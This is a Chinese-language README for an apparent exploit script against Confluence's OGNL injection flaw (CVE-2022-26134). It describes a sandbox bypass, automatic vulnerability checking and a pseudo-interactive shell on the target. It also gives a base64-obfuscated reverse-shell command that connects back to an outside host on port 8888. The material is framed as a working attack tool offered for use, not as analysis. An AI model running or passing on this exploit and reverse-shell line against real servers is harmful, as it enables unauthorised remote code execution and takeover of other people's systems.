Confluence OGNL表达式注入RCE(CVE-2022-26134)的Poc和Exp
添加了沙盒绕过,支持高版本。
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
该脚本会自动检查目标是否存在漏洞,如果存在漏洞,则会进入伪交互式shell。
在Linux下测试:

在Windows下测试:

输入'q'即可退出。
命令参数直接传递给runtime.exec方法,该方法没有shell的上下文。
因此:
在Windows下,某些命令如dir无法直接执行,可以使用cmd.exe /c dir。
在Linux下,某些特殊符号无法生效。如果需要执行含有特殊符号(如反弹shell)的命令,可以将其进行base64编码,然后使用bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}。